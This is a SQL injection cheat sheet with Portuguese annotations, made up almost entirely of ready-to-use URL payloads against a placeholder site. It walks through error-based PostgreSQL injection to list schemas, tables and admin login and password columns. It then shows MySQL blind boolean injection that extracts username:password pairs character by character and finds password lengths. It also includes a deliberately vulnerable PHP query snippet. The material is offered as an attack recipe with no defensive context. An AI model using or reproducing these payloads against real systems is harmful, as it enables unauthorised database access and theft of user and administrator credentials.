--offset 1 --offset 2 --offset 3
http://www.site.com/code.php?id=10 and 1=cast((select schema_name from information_schema.schemata limit 1 offset 1)::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select schema_name from information_schema.schemata limit 1 offset 2)::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select table_name from information_schema.tables where table_schema=CHR(100) || CHR(98) || CHR(95) || CHR(115) || CHR(105) || CHR(116) || CHR(101) limit 1 offset 0)::text as int)--
--offset 1 --offset 2
http://www.site.com/code.php?id=10 and 1=cast((select column_name from information_schema.columns where table_schema=CHR(100) || CHR(98) || CHR(95) || CHR(115) || CHR(105) || CHR(116) || CHR(101) and table_name = CHR(97) || CHR(100) || CHR(109) || CHR(105) || CHR(110) limit 1 offset 0)::text as int)--
db:db_site table:admin coluna:login,senha
http://www.site.com/code.php?id=10 and 1=cast((select NOME_COLUNA from NOME_DB.NOME_TABELA)::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select login from db_site.admin)::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select senha from db_site.admin)::text as int)--
http://www.site.com/news.php?id=5 and 1=1 <- carrega normalmente
http://www.site.com/news.php?id=5 and 1=2 <- Algum defeito na página = VULNERÁVEL
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
http://www.site.com/news.php?id=5 and (select 1)=1
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
wp-users,webuser,user,login,admin,adm,administrator,etc...
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
<?php /* [...] */ $id = $_GET['id']; $sql = "SELECT * FROM noticias WHERE id = '$id'"; $q = mysql_query($sql); $r = @mysql_fetch_row($q); /[...] / ?>
FALSE: http://www.site.com/index.php?id=10 AND 1=0
TRUE: http://www.site.com/index.php?id=10 AND 1=1
http://www.site.com/index.php?id=10 AND(SELECT Count(*) FROM users)
http://www.site.com/index.php?id=10 AND(SELECT Count(*) FROM admin)
http://www.site.com/index.php?id=10 AND(SELECT Count(nick) FROM admin)
http://www.site.com/index.php?id=10 AND(SELECT Count(password) FROM admin)
http://www.site.com/index.php?id=10 AND(SELECT length(password) FROM admin where id=1)=4 //FALSE http://www.site.com/index.php?id=10 AND(SELECT length(password) FROM admin where id=1)=6 //FALSE http://www.site.com/index.php?id=10 AND(SELECT length(password) FROM admin where id=1)=8 //TRUE
http://www.site.com/index.php?id=10 AND ascii(substring((SELECT concat(password) from admin limit 0,1),1,1))=102 <== TRUE
http://www.site.com/index.php?id=10 AND ascii(substring((SELECT concat(password) from admin limit 0,1),2,1))=121 <== TRUE